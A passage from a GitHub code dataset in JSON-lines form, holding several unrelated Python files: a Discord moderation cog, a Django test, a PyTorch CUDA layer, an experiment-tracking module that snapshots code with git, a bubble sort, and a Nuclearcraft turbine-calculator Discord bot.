error_embed(Messages.clear_fail))\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.respond(embed = error_embed(Messages.missing_permissions.replace(\"{}\", \"`MANAGE_MESSAGES`\")), ephemeral = True)\n\n elif isinstance(error, commands.BotMissingPermissions):\n await ctx.respond(embed = error_embed(Messages.bot_missing_permissions.replace(\"{}\", \"`MANAGE_MESSAGES`\")), ephemeral = True)\n\n\ndef setup(bot):\n bot.add_cog(Clear(bot))\n","repo_name":"Voided-Git/simple-discord-bot","sub_path":"exts/moderation/clear.py","file_name":"clear.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22959165446","text":"from django.test import TestCase, Client\n\nfrom django.urls import reverse, resolve\n\nfrom users.views import register\n\nclass TestViews(TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def test_get_register(self):\n \"\"\" Testing get register function \"\"\"\n response = self.client.get(reverse('users-register'))\n\n self.assertEqual(response.status_code, 200)\n\n self.assertTemplateUsed(response, 'users/register.html')\n","repo_name":"ahmedmunir/django-blog","sub_path":"users/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5550486125","text":"import torch\nfrom torch.utils.cpp_extension import load\n\ntest_kernel = load(name=\"test_kernel\", sources=[\"src/mathutil_cuda.cpp\", \"src/mathutil_cuda_kernel.cu\"])\n\nclass CudaLinear(torch.nn.Linear):\n def forward(self, x):\n # y will be (*, out_features)\n x_flat = x.view(-1, x.shape[-1])\n y_shape = (*x.shape[:-1], self.out_features)\n y = torch.zeros(y_shape, device='cuda')\n test_kernel.linear(x_flat, self.weight, self.bias, y)\n return y","repo_name":"epitaque/pytorch-custom-kernel","sub_path":"custom_kernel_modules.py","file_name":"custom_kernel_modules.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5731802708","text":"# Crear archivo y en caso de que existe lee la informacion\ndef crear_archivo():\n\n try:\n\n file = open('informacion.dat', 'x') # crear el archivo y se apertura\n file.close() # Cierra el archivo\n except FileExistsError:\n\n print('El archivo ya existe, ha sido creado previamente')\n\n except Exception as e:\n\n print(f'Error: {e}')\n\n if FileExistsError:\n\n try:\n\n with open('informacion.dat', 'r') as file:\n\n datos = file.readlines()\n\n for linea in datos:\n\n print(linea)\n\n except Exception as e:\n\n print({e})\n\n\ncrear_archivo()\n","repo_name":"IsauraCG/python_avanzado","sub_path":"M4_S8_Rebound_Gestion de Archivos/otro_rebound.py","file_name":"otro_rebound.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13109119733","text":"# -*- coding: utf-8 -*-\n# Date: 2020/3/17 12:14\n\n\"\"\"\na tool module for managing model checkpoints, tensorboard, and experiment records\nThe key idea is to deal with the structure of directory, we only consider what files are needed to save, and then\nthe file will be saved in the appropriate location.\n\"\"\"\nimport subprocess\n\nfrom torchfurnace.utils.function import log\n\n__author__ = 'tianyu'\n\nimport sys\nimport time\nimport shutil\nfrom pathlib import Path\nfrom contextlib import contextmanager\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom .utils.tracer_component import Config, Model\n\n\nclass Committer(object):\n SNAPSHOT_GIT_NAME = \".snapshootgit\"\n SNAPSHOT_GITIGNORE_NAME = \".snapignore\"\n\n def __init__(self, code_dir: Path, work_name: str):\n self._code_dir = code_dir\n self._work_name = code_dir / work_name\n self._snapshoot_git_path = self._code_dir / self.SNAPSHOT_GIT_NAME\n\n def commit(self):\n self._check_snapshootgit()\n \"\"\"automatically commit code\"\"\"\n try:\n with self._git_switcher(self._code_dir):\n ret = subprocess.call(\n \" && \".join([f\"cd {self._code_dir}\",\n \"git add -A\",\n \"git commit -a -m auto_commit\"]), shell=True)\n return {\"ret\": ret, 'commit_id': self._get_commits(self._code_dir / '.git')[-1]}\n except BaseException as e:\n log(msg='Some error occurs during committing.', color='red')\n raise e\n\n def revert(self, commit_id):\n \"\"\"copy gaven version to work experiment\n :param commit_id: 回退版本的 commit-id\n \"\"\"\n flag = False\n for id in self._get_commits(self._snapshoot_git_path):\n if id.startswith(commit_id):\n flag = True\n commit_id = id\n break\n if not flag:\n raise RuntimeError(\"snaphosted repo don't exist!\")\n\n revert_path = self._work_name / 'revert' / commit_id[:7]\n revert_path.mkdir(parents=True)\n\n shutil.copytree(self._snapshoot_git_path, (revert_path / self.SNAPSHOT_GIT_NAME))\n try:\n with self._git_switcher(revert_path):\n ret = subprocess.call(\n \" && \".join([f\"cd {revert_path}\", f\"git reset --hard {commit_id}\"]), shell=True\n )\n return ret\n except BaseException as e:\n log(msg='Some error occurs during reverting copy process!.', color='red')\n raise e\n\n def _check_snapshootgit(self):\n if not self._snapshoot_git_path.exists():\n # create git repo for code capturing\n user_gitignore = ''\n if (self._code_dir / '.gitignore').exists():\n user_gitignore = (self._code_dir / '.gitignore').open().read()\n\n snap_ignore = self._code_dir / self.SNAPSHOT_GITIGNORE_NAME\n snap_ignore.write_text(\"\"\"\n {user_gitignore}\n # exclude user's git repo\n .git_backup/\n .gitignore_backup\n \n .gitignore\n \n # experiment dirs\n {work_name}/\n \n # some data files\n *.tar*\n *.mdb*\n *.lmdb*\n \"\"\".format(user_gitignore=user_gitignore, work_name=self._work_name), encoding='utf-8')\n\n with self._git_switcher(self._code_dir):\n # init snapshot repo\n ret = subprocess.call(\"git init\", shell=True)\n if ret != 0:\n raise RuntimeError('git tool maybe not be installed in your system')\n\n @staticmethod\n def _get_commits(path: Path):\n \"\"\"从项目目录下的记录获取 snapgit 的所有 commit-id\n \"\"\"\n lines = (path / 'logs' / 'refs' / 'heads' / 'master').open('r').readlines()\n commit_ids = []\n for line in lines:\n commit_ids.append(line.split()[1])\n\n return commit_ids\n\n @contextmanager\n def _git_switcher(self, path: Path):\n self._switch_to_snap_git(path)\n yield\n self._switch_to_standard_git(path)\n\n def _switch_to_snap_git(self, path: Path):\n \"\"\"将工作目录从通常的 git 模式切换成 snapgit 模式\n \"\"\"\n checkout = [('.git', '.git_backup'), ('.gitignore', '.gitignore_backup'),\n (self.SNAPSHOT_GIT_NAME, '.git'), (self.SNAPSHOT_GITIGNORE_NAME, '.gitignore')]\n for de in checkout:\n if (path / de[0]).exists():\n (path / de[0]).rename((path / de[1]))\n\n def _switch_to_standard_git(self, path: Path):\n \"\"\"将工作目录从 snapgit 模式切换成通常的 git 模式\n \"\"\"\n checkout = [('.git', '.git_backup'), ('.gitignore', '.gitignore_backup'),\n (self.SNAPSHOT_GIT_NAME, '.git'), (self.SNAPSHOT_GITIGNORE_NAME, '.gitignore')]\n for de in checkout[::-1]:\n if (path / de[1]).exists():\n (path / de[1]).rename((path / de[0]))\n\n\nclass Tracer(object):\n CONFIG_NAME = 'run_config'\n ARCH_NAME = 'architecture'\n\n def __init__(self, root_dir=Path('.'), work_name='network', clean_up=5):\n self._committer = Committer(code_dir=root_dir, work_name=work_name)\n self._snap_git_switch = True\n self._tb_switch = True\n self._debug_switch = False\n self._dirs = {\n 'work_name': root_dir / work_name\n }\n self._clean_up_top = clean_up\n\n def _start_log(self, logger_name):\n # redirect stdout stderr to file\n self._log = open(logger_name, 'w', encoding='utf-8')\n self._stderr = sys.stderr\n self._stdout = sys.stdout\n sys.stderr = self._log\n sys.stdout = self._log\n\n def _clean_up(self):\n # remain Top5 best model checkpoint\n files = self._dirs['checkpoint_best'].glob('{}*'.format(self._clean_up_prefix))\n import re, os\n files = sorted(files, key=lambda x: float(re.findall(r'Acc(.*?)_', str(x))[0]), reverse=True)\n for file in files[self._clean_up_top:]:\n os.remove(file)\n\n def dirs(self, path_key):\n assert self._dirs.__contains__(path_key), f\"{path_key} is wrong path_name.\"\n return self._dirs.get(path_key)\n\n def close(self):\n if self._clean_up_top > 0:\n self._clean_up()\n # close I/O\n if self._tb_switch: self._tb.close()\n if not self._debug_switch:\n self._log.close()\n # recovery stdout stderr to system\n sys.stderr = self._stderr\n sys.stdout = self._stdout\n\n @property\n def tb(self):\n # expose to caller\n return self._tb\n\n @staticmethod\n def _get_now_time():\n return time.strftime('%m%d_%H-%M-%S', time.localtime(time.time()))\n\n def _build_dir(self):\n for k, d in self._dirs.items():\n if k == 'experiment_name': continue\n if not d.exists(): d.mkdir(parents=True)\n\n def snap_git_switch(self, status):\n self._snap_git_switch = status\n return self\n\n def tb_switch(self, status):\n self._tb_switch = status\n return self\n\n def debug_switch(self, status):\n self._debug_switch = status\n return self\n\n def attach(self, experiment_name='exp', logger_name='log', override=True):\n if not override:\n experiment_name += f\"_{Tracer._get_now_time()}\"\n self._dirs['experiment_name'] = experiment_name\n if self._tb_switch:\n self._dirs['tensorboard'] = self._dirs['work_name'] / 'tensorboard' / f\"{self._dirs['experiment_name']}\"\n self._dirs['models'] = self._dirs['work_name'] / 'models' / self._dirs['experiment_name']\n self._dirs['checkpoint_best'] = self._dirs['models'] / 'checkpoint' / 'best'\n self._dirs['logs'] = self._dirs['work_name'] / 'logs' / self._dirs['experiment_name']\n\n self._build_dir()\n\n # edit tensorboard log_dir\n if self._tb_switch:\n self._tb = SummaryWriter(log_dir=self._dirs['tensorboard'])\n print(f\"Start Tensorboard ... [tensorboard --port=6006 --logdir {self._dirs['tensorboard']}]\")\n\n # new log file\n logger_name = self._dirs['logs'] / logger_name\n if logger_name.exists(): logger_name = f'{logger_name}_{self._get_now_time()}'\n\n if not self._debug_switch: self._start_log(logger_name)\n\n # automatically generate a readme for recording something\n (self._dirs['models'] / 'readme.txt').open('w+', encoding='utf-8')\n\n # expose dirs\n return self\n\n def store(self, component):\n if isinstance(component, Config):\n if self._snap_git_switch:\n # add snap commit id\n log(msg=\"==== auto commit ====\", color='blue')\n try:\n state = self._committer.commit()\n if state['ret'] == 0:\n component.add_item('snap_commit_id', state['commit_id'])\n log(msg=f\"commit id: {state['commit_id']}\")\n else:\n log(msg=f\"some errors in the proecess of commiting!\", color='red')\n except Exception as e:\n log(msg='auto commit fail!', color='red')\n log(msg='+++ Trace +++')\n log(msg=str(e))\n\n component.save(self._dirs['models'] / f'{Tracer.CONFIG_NAME}.json')\n if isinstance(component, Model):\n self._clean_up_prefix = component.name.replace('.pth.tar', '')\n component.save(self._dirs['checkpoint_best'].parent, self._dirs['models'] / f'{Tracer.ARCH_NAME}.txt')\n\n def load(self, component):\n if isinstance(component, Model):\n return component.load(self._dirs['work_name'] / 'models')\n\n def revert(self, commit_id):\n self._committer.revert(commit_id)\n","repo_name":"tianyu-su/torchfurnace","sub_path":"torchfurnace/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":9986,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"1194698068","text":"#Imports\r\nimport sys\r\n\r\n#bubbleSort algorithm\r\ndef bubbleSort(list1):\r\n n = len(list1)\r\n\r\n for i in range(n):\r\n\r\n for j in range(0, n-i-1):\r\n if list1[j] > list1[j+1]:\r\n\r\n list1[j], list1[j+1] = list1[j+1], list1[j]\r\n\r\n#takes user input and converts to list to int list\r\nnumbers = input('Input the numbers you would like to sort (Separtated by a space):')\r\n\r\nnumberList = numbers.split(\" \")\r\n\r\nfor i in range(len(numberList)):\r\n numberList[i] = int(numberList[i])\r\n\r\n#Runs algorithm and spits the output\r\nbubbleSort(numberList)\r\n\r\nprint('The sorted list is: ' + str(numberList))\r\n\r\nsys.exit()","repo_name":"thewhitelisted/bubblesorts","sub_path":"numberSorter.py","file_name":"numberSorter.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38939164062","text":"import discord\nfrom discord.ext import commands\nfrom math import pow, sqrt, ceil, sin, pi\nfrom math import log as ln\nimport asyncio\nimport re\n\ntoken = [REDACTED]\nenabled_channel = [REDACTED]\n\n\nbladeStats = {\"trinitite\": [0.6, 0.0, True], \"thorium\": [0.65, 0.0, True], \"du\": [0.7, 0.0, True],\n \"stator\": [0.75, 0.0, True], \"e60\": [0.8, 0.0, True], \"une-90\": [0.85, 1.0, False],\n \"une-192\": [0.9, 1.1, False], \"une-231\": [0.95, 1.2, False], \"edelstahl\": [1.25, 1.5, False],\n \"niosteel\": [1.35, 1.0, False], \"steel\": [1.4, 1.0, False], \"neptunium\": [1.45, 1.03, False],\n \"plutonium\": [1.50, 1.06, False], \"legierung\": [1.50, 1.5, False], \"extnio\": [1.55, 1.1, False],\n \"extreme\": [1.6, 1.1, False], \"americium\": [1.65, 1.13, False], \"curium\": [1.7, 1.16, False],\n \"sicnio\": [1.75, 1.2, False], \"matrix\": [1.75, 1.5, False], \"sic\": [1.8, 1.2, False],\n \"berkelium\": [1.9, 1.23, False], \"steelcake\": [2.0, 1.0, False], \"californium\": [2.2, 1.27, False],\n \"hccake\": [3.0, 1.08, False], \"extremecake\": [4.0, 1.06, False], \"tccake\": [5.0, 1.08, False],\n \"febcake\": [6.0, 1.08, False], \"toughcake\": [8.0, 1.16, False], \"siccake\": [16.0, 1.20, False]}\n\nbladeAliases = {\"trinitite\": [\"trinitite\", \"tri\", 752973193878175825],\n \"thorium\": [\"thorium\", \"th\", \"ths\", 752973193710665809],\n \"du\": [\"du\", \"dus\", 752973193740026008],\n \"stator\": [\"stator\", \"sta\", \"st\", 752974289866719253],\n \"e60\": [\"e60\", \"e-60\", \"elektron60\", 752973194033365042],\n \"une-90\": [\"une-90\", \"unwieldy-90\", \"une90\", 752973096742289428],\n \"une-192\": [\"une-192\", \"unwieldy-192\", \"une192\", 752973096922644520],\n \"une-231\": [\"une-231\", \"unwieldy-231\", \"une231\", 752973096700608615],\n \"edelstahl\": [\"edelstahl\", \"ultralight-edelstahl\", \"ul-edel\", \"ultralightedelstahl\", \"ule\", 752973096738226316],\n \"niosteel\": [\"niosteel\", \"niobium-steel\", \"nios\", 752973097044279437],\n \"steel\": [\"steel\", \"ste\", \"s\", 752974289766187068],\n \"neptunium\": [\"neptunium\", \"np\", 752973096884895866],\n \"plutonium\": [\"plutonium\", \"pu\", 752973097170239498],\n \"legierung\": [\"legierung\", \"ultralight-legierung\", \"ul-legie\", \"ultralightlegierung\", \"ull\", 752973096641888348],\n \"extnio\": [\"extnio\", \"extremenio\", \"extreme-nio\", \"enio\", 752973097040347167],\n \"extreme\": [\"extreme\", \"ext\", \"ex\", 752974289719918663],\n \"americium\": [\"americium\", \"am\", 752973096561934437],\n \"curium\": [\"curium\", \"cm\", 752973096608071770],\n \"sicnio\": [\"sicnio\", \"sicniosic\", 752973097300131890],\n \"matrix\": [\"matrix\", \"ultralight-matrix\", \"ul-matrix\", \"ultralightmatrix\", \"ulm\", 752973096771780721],\n \"sic\": [\"sic\", \"sicsiccmc\", \"sicsic\", 752974289569054752],\n \"berkelium\": [\"berkelium\", \"bk\", 752973096553676931],\n \"steelcake\": [\"steelcake\", \"scake\", 761850409538551819],\n \"californium\": [\"californium\", \"cf\", 752973096566128790],\n \"hccake\": [\"hccake\", \"hardcarboncake\", 761850409110732811],\n \"extremecake\": [\"extremecake\", \"extcake\", 761850409835954196],\n \"tccake\": [\"tccake\", \"thermoconductingcake\", 761850409366978571],\n \"febcake\": [\"febcake\", \"ferroboroncake\", 761850277619302401],\n \"toughcake\": [\"toughcake\", \"tcake\", 761850277514575882],\n \"siccake\": [\"siccake\", \"sicsiccake\", 761850409370517515]}\n\nbladeConversions = {\"trinitite\": \"0\", \"thorium\": \"1\", \"du\": \"2\", \"stator\": \"3\", \"e60\": \"4\", \"une-90\": \"5\",\n \"une-192\": \"6\", \"une-231\": \"7\", \"edelstahl\": \"8\", \"niosteel\": \"9\", \"steel\": \"a\", \"neptunium\": \"b\",\n \"plutonium\": \"c\", \"legierung\": \"d\", \"extnio\": \"e\", \"extreme\": \"f\", \"americium\": \"g\", \"curium\": \"h\",\n \"sicnio\": \"i\", \"matrix\": \"j\", \"sic\": \"k\", \"berkelium\": \"l\", \"steelcake\": \"m\", \"californium\": \"n\",\n \"hccake\": \"o\", \"extremecake\": \"p\", \"tccake\": \"q\", \"febcake\": \"r\", \"toughcake\": \"s\", \"siccake\": \"t\"}\n\ngasStats = {\"hps\": [16.0, 4.0], \"lps\": [4.0, 2.0], \"steam\": [4.0, 2.0], \"scs\": [16.0, 16.0], \"scco2\": [24.0, 8.0],\n \"n2\": [11.0, 2.0], \"co2\": [17.0, 3.0], \"he\": [30.0, 4.0], \"ar\": [12.0, 2.0], \"ne\": [51.0, 8.0],\n \"kr\": [24.3, 5.0], \"xe\": [22.0, 6.0]}\n\ngasAliases = {\"hps\": [\"hps\", \"High Pressure Steam\", \"highpressuresteam\", \"hpsteam\"],\n \"lps\": [\"lps\", \"Low Pressure Steam\", \"lowpressuresteam\", \"lpsteam\"],\n \"steam\": [\"steam\", \"Steam\", \"meksteam\", \"tes\", \"forgesteam\", \"testeam\"],\n \"scs\": [\"scs\", \"Supercritical Steam\", \"supercriticalsteam\", \"scsteam\"],\n \"scco2\": [\"scco2\", \"Supercritical Carbon Dioxide\", \"supercriticalco2\",\n \"supercriticalcarbondioxide\", \"sco2\", \"scarbondioxide\", \"sccarbondioxide\"],\n \"n2\": [\"n2\", \"Hot Nitrogen\", \"nitrogen\", \"hotnitrogen\", \"hotn2\"],\n \"co2\": [\"co2\", \"Hot Carbon Dioxide\", \"carbondioxide\", \"hotco2\", \"hotcarbondioxide\"],\n \"he\": [\"he\", \"Hot Helium\", \"helium\", \"hothelium\", \"hothe\"],\n \"ar\": [\"ar\", \"Hot Argon\", \"argon\", \"hotargon\", \"hotar\"],\n \"ne\": [\"ne\", \"Hot Neon\", \"neon\", \"hotneon\", \"hotne\"],\n \"kr\": [\"kr\", \"Hot Krypton\", \"krypton\", \"hotkrypton\", \"hotkr\"],\n \"xe\": [\"xe\", \"Hot Xenon\", \"xenon\", \"hotxenon\", \"hotxe\"]}\n\noverhaulAliases = [\"overhaul\", \"oh\", \"nco\", \"over\"]\npreoverhaulAliases = [\"pre-overhaul\", \"po\", \"underhaul\", \"preoverhaul\", \"uh\", \"nc\"]\n\nclient = commands.Bot(command_prefix=\"&\")\nclient.remove_command(\"help\")\n\n\n# controls embed menus\nasync def embedSetup(ctx, embeds: list):\n page = 0\n botMessage = await ctx.send(embed=embeds[page])\n if len(embeds) > 1:\n await botMessage.add_reaction(\"\\U0000274C\")\n await botMessage.add_reaction(\"\\U000025C0\")\n await botMessage.add_reaction(\"\\U000025B6\")\n\n def check(r, u):\n return u == ctx.message.author and str(r.emoji) in (\"\\U000025B6\", \"\\U000025C0\", \"\\U0000274C\")\n\n while True:\n try:\n react, user = await client.wait_for(\"reaction_add\", timeout=60.0, check=check)\n except asyncio.TimeoutError:\n await botMessage.clear_reactions()\n break\n else:\n if str(react.emoji) == \"\\U000025B6\":\n page += 1\n if page == len(embeds):\n page = 0\n await botMessage.edit(embed=embeds[page])\n await botMessage.remove_reaction(emoji=\"\\U000025B6\", member=user)\n elif str(react.emoji) == \"\\U000025C0\":\n page -= 1\n if page == -1:\n page = len(embeds) - 1\n await botMessage.edit(embed=embeds[page])\n await botMessage.remove_reaction(emoji=\"\\U000025C0\", member=user)\n elif str(react.emoji) == \"\\U0000274C\":\n await botMessage.clear_reactions()\n break\n\n\n# calculate stats\ndef calcStats(mode, gasName, gasRFMB, gasExp, blades, dims, gasInput, coilEff):\n def idealMult(ideal, actual):\n return min(ideal, actual)/max(ideal, actual)\n\n actualExp, idealExp, embedsList = [], [], []\n totalExp, bladeMult, minStatorExp, maxStatorExp, minBladeExp = 1.0, 0.0, 1.0, 2.0**(-1000), 2.0**1000\n maxBladeExp, throughputBonus = 1.0, 1.0\n statorCount, minInput = 0, 0\n rotorsDict = {alias: 0 for alias in list(bladeAliases)}\n bladeString, statsString, blocksString, rotorsString, footerText, footer2Text = \"\", \"\", \"\", \"\", \"\", \"\"\n turbineString = \"/{0}/{1}/{2}/{3}\".format(mode, gasName, gasRFMB, gasExp)\n if dims is not None:\n turbineString += \"/{0}/{1}/\".format(dims[0], dims[1])\n if gasName != \"Custom\":\n gasName = gasAliases[gasName][1]\n\n for i in range(len(blades)):\n currentBlade = bladeStats[blades[i]]\n prevExp = totalExp\n idealExp.append(pow(gasExp, (i + 0.5)/len(blades)))\n totalExp *= currentBlade[0]\n bladeString += \"{} \".format(client.get_emoji(bladeAliases[blades[i]][-1]))\n rotorsDict[blades[i]] += 1\n if currentBlade[2]:\n statorCount += 1\n if mode in preoverhaulAliases:\n actualExp.append((prevExp + totalExp)/2)\n if blades[i] == \"sic\":\n bladeMult += 0.05*idealMult(idealExp[i], actualExp[i])\n elif mode in overhaulAliases:\n actualExp.append(prevExp*sqrt(currentBlade[0]))\n if currentBlade[2]:\n minStatorExp = min(minStatorExp, currentBlade[0])\n maxStatorExp = max(maxStatorExp, currentBlade[0])\n else:\n minBladeExp = min(minBladeExp, currentBlade[0])\n maxBladeExp = max(maxBladeExp, currentBlade[0])\n\n bladeMult += currentBlade[1]*idealMult(idealExp[i], actualExp[i])\n if dims is not None:\n turbineString += \"{0}\".format(bladeConversions[blades[i]])\n turbineString += \"/\"\n\n try:\n bladeMult /= len(blades) - statorCount\n except ZeroDivisionError:\n bladeMult = 0.0\n\n energyDensity = gasRFMB*bladeMult*idealMult(gasExp, totalExp)\n\n if dims is not None: # dims is the tuple (turbineDim, bearingDim) or None if dims aren't input!\n shaftLen = len(blades)\n bearings = 2*dims[1]**2\n frames = 8*(dims[0] + 1) + 4*shaftLen\n casings = 2*(dims[0] ** 2) + 4*(dims[0]*shaftLen) - 2*bearings - 3 # assumes coils = bearings, 1 inlet & 1 outlet\n coils = min(bearings, 2*dims[0]**2 - bearings - 2)\n if bearings > dims[0]**2: # if bearings are more than half the in/out surface area, all casings are covered by coils\n casings = 4*(dims[0]*shaftLen) - 1\n shafts = (bearings*shaftLen) // 2\n bladeArea = 2*dims[1]*(dims[0]-dims[1])\n maxInput = bladeArea*(shaftLen - statorCount)*100\n\n if gasInput is None:\n gasInput = maxInput\n\n if mode in overhaulAliases:\n # low throughput penalty\n if gasExp <= 1.0 or maxBladeExp <= 1.0:\n effMinLen = 24.0\n else:\n effMinLen = ceil(ln(gasExp)/ln(maxBladeExp))\n absLeniency = 400*effMinLen\n minInput = int(max(0, 0.75*maxInput - absLeniency))\n\n if maxInput == 0:\n throughputRatio = 1.0\n else:\n throughputRatio = min(1.0, (absLeniency + gasInput)/maxInput)\n\n if throughputRatio >= 0.75:\n throughputPenalty = 1.0\n else:\n throughputPenalty = 0.5*sin(throughputRatio*pi/1.5) + 0.5\n\n # high throughput bonus\n if minBladeExp <= 1.0 or minStatorExp >= 1.0:\n effMaxLen = 24\n else:\n effMaxLen = max(1, min(24, ceil(ln(gasExp) - 24*(ln(minStatorExp)/ln(minBladeExp/minStatorExp)))))\n\n lengthBonus = gasInput/(100.0 * effMaxLen * bladeArea)\n areaBonus = sqrt(gasInput/(1200.0 * shaftLen * effMaxLen))\n throughputBonus = 1 + pow(lengthBonus*areaBonus, 2.0/3.0)\n\n energyDensity *= throughputPenalty*throughputBonus\n\n if coilEff is not None:\n energyDensity *= coilEff\n\n powerOutput = int(energyDensity*gasInput)\n\n # create field strings\n # field 1.2: turbine stats (field 1.1, gas stats is created on embed creation later)\n if mode in overhaulAliases:\n gasInput = int(min(gasInput, 2*maxInput))\n statsString = \"Dimensions: {0}x{0}x{1} ({2}x{2} Bearing)\\n\" \\\n \"Power Output\\*: {3:,} RF/t\\n\" \\\n \"Total Expansion: {4:.2%} [{5:g} x {6:.2%}]\\n\" \\\n \"Rotor Efficiency: {9:.2%}\\n\" \\\n \"Throughput Bonus: {7:.2%}\\n\" \\\n \"Energy Density\\*: {8:.2f} RF/mB\\n\".format(dims[0], shaftLen, dims[1], powerOutput, totalExp,\n gasExp, totalExp/gasExp, throughputBonus,\n energyDensity, bladeMult)\n if gasInput:\n statsString += \"Input Rate: {0:,}/{1:,} mB/t [{2:.0%}]\\n\" \\\n \"Min Input\\*\\*: {3:,} mB/t\\n\".format(gasInput, maxInput, gasInput/maxInput, minInput)\n footerText = \"*Dynamo efficiency not included.\\n**Minimum mB/t of gas needed for no penalty.\\n\"\n if coilEff:\n statsString += \"Dynamo Efficiency: {0:.2%}\\n\".format(coilEff)\n footerText = \"*Dynamo efficiency included.\\n**Minimum mB/t of gas needed for no penalty.\\n\"\n elif mode in preoverhaulAliases:\n gasInput = int(min(gasInput, maxInput))\n statsString = \"Dimensions: {0}x{0}x{1} ({2}x{2} Bearing)\\n\" \\\n \"Power Output\\*: {3:,} RF/t\\n\" \\\n \"Total Expansion: {4:.2%} [{5:g} x {6:.2%}]\\n\" \\\n \"Rotor Efficiency: {8:.2%}\\n\" \\\n \"Energy Density\\*: {7:.2f} RF/mB\\n\".format(dims[0], shaftLen, dims[1], powerOutput, totalExp,\n gasExp, totalExp / gasExp, energyDensity, bladeMult)\n statsString += \"Input Rate: {0:,}/{1:,} mB/t [{2:.0%}]\\n\".format(gasInput, maxInput, gasInput/maxInput)\n if coilEff is None:\n footerText = \"*Dynamo efficiency not included.\\n\"\n else:\n statsString += \"Dynamo Efficiency: {0:.2%}\\n\".format(coilEff)\n footerText = \"*Dynamo efficiency included.\\n\"\n\n # field 2.1: blocks required string\n if mode in overhaulAliases:\n blocksString = \"Casings (total): {4} ({0})*\\nCasings (as frame): {1}\\nBearings: {2}\\nShafts: {3}\\nCoils: {5}\\n\" \\\n \"Inlets: 1\\nOutlets: 1\\nController: 1\\n\".format(casings, frames, bearings, shafts,\n casings + frames, coils)\n footer2Text = \"*Turbine glass needed for transparent turbine.\\n\"\n elif mode in preoverhaulAliases:\n blocksString = \"Casings: {0}\\nFrames: {1}\\nBearings: {2}\\nShafts: {3}\\nCoils: {4}\\n\" \\\n \"Inlets: 1\\nOutlets: 1\\nController: 1\\n\".format(casings, frames, bearings, shafts, coils)\n\n # field 2.2: rotor blade string\n rotorsString += \"Total Blades: {:,}\\n\".format(bladeArea * shaftLen)\n for rotorName, rotorCount in rotorsDict.items():\n if rotorCount == 0:\n continue\n else:\n rotorsString += \"{0} x{1:,}\\n\".format(client.get_emoji(bladeAliases[rotorName][-1]), rotorCount*bladeArea)\n\n # alternative field 1.2 when dimensions are not input\n else:\n statsString = \"Shaft Length: {0}\\nTotal Expansion: {1:.2%} [{2:g} x {3:.2%}]\\n\" \\\n \"Rotor Efficiency: {4:.2%}\\nEnergy Density\\*: {5:.2f} RF/mB\".format(len(blades), totalExp,\n gasExp, totalExp/gasExp,\n bladeMult, energyDensity)\n footerText = \"*Any coil and gas input modifiers not included.\\n\"\n\n # produce embeds\n statsPage1 = discord.Embed(title=\"{} Turbine (Stats)\".format(mode.capitalize()), colour=0x123456, description=\n \"An overview of the given turbine's stats.\")\n statsPage1.add_field(name=\"Blade Configuration\", value=bladeString, inline=False)\n statsPage1.add_field(name=\"Gas Stats\", value=\"Name: {0}\\nBase Energy: {1:g} RF/mB\\nIdeal Expansion: {2:.0%}\\n\"\n .format(gasName, gasRFMB, gasExp), inline=False)\n statsPage1.add_field(name=\"Turbine Stats\", value=statsString, inline=False)\n statsPage1.set_footer(text=\"{}Turbine Calculator Bot by FishingPole#3673\".format(footerText))\n embedsList = [statsPage1]\n if dims is not None:\n statsPage1.add_field(name=\"Turbine String (Copy & paste in &stats command)\", value=turbineString, inline=False)\n statsPage2 = discord.Embed(title=\"{} Turbine (Blocks)\".format(mode.capitalize()), colour=0x123456, description=\n \"An overview of the blocks required to build the turbine.\")\n statsPage2.add_field(name=\"Blocks Required\", value=blocksString, inline=False)\n statsPage2.add_field(name=\"Blades Required\", value=rotorsString, inline=False)\n statsPage2.set_footer(text=\"{}Turbine Calculator Bot by FishingPole#3673\".format(footer2Text))\n embedsList.append(statsPage2)\n\n return embedsList\n\n\n@client.event\nasync def on_ready():\n print('Bot online as {0.user}'.format(client))\n\n\n@client.command()\nasync def ping(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"Pong! `{:.0f} ms`\".format(client.latency*1000))\n\n\n@client.command()\nasync def smore(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"S'more! {}\".format(str(client.get_emoji(493612965195677706))))\n\n\n@client.command()\nasync def praise(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"{}\".format(str(client.get_emoji(588415212223201327))))\n\n\n@client.command(aliases=[\"ban\", \"banhammer\"])\nasync def banned(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"{}\".format(str(client.get_emoji(717806537967534232))))\n\n\n@client.command(aliases=[\"fishingpole\", \"FishingPole\", \"thepolethatfishes\", \"ThePoleThatFishes\"])\nasync def pole(ctx):\n if ctx.channel.id == enabled_channel:\n await ctx.send(\"{}\".format(str(client.get_emoji(711260788215644230))))\n\n\n@client.command()\nasync def help(ctx):\n footer = \"Turbine Calculator Bot by FishingPole#3673\"\n imageURL = \"https://cdn.discordapp.com/attachments/754459106709995600/766026990129119242/bottutorial.png\"\n helpPage1 = discord.Embed(title=\"Help menu (Page 1)\", colour=0x123456, description=\"A list of available commands!\")\n helpPage1.add_field(name=\"&calc/&turbine/&plan\", value=\"Calculate a turbine given some parameters. Syntax:\\n\"\n \"`&calc [mode] [fuel] (dimensions) [blades]` or \\n\"\n \"`&calc [mode] [base RF/mB] [ideal expansion] (dimensions) [blades]`\\n\"\n \"See page 2 for more details!\")\n helpPage1.add_field(name=\"&stats\", value=\"Calculate a turbine's stats using specific input rate and dynamo efficiency. 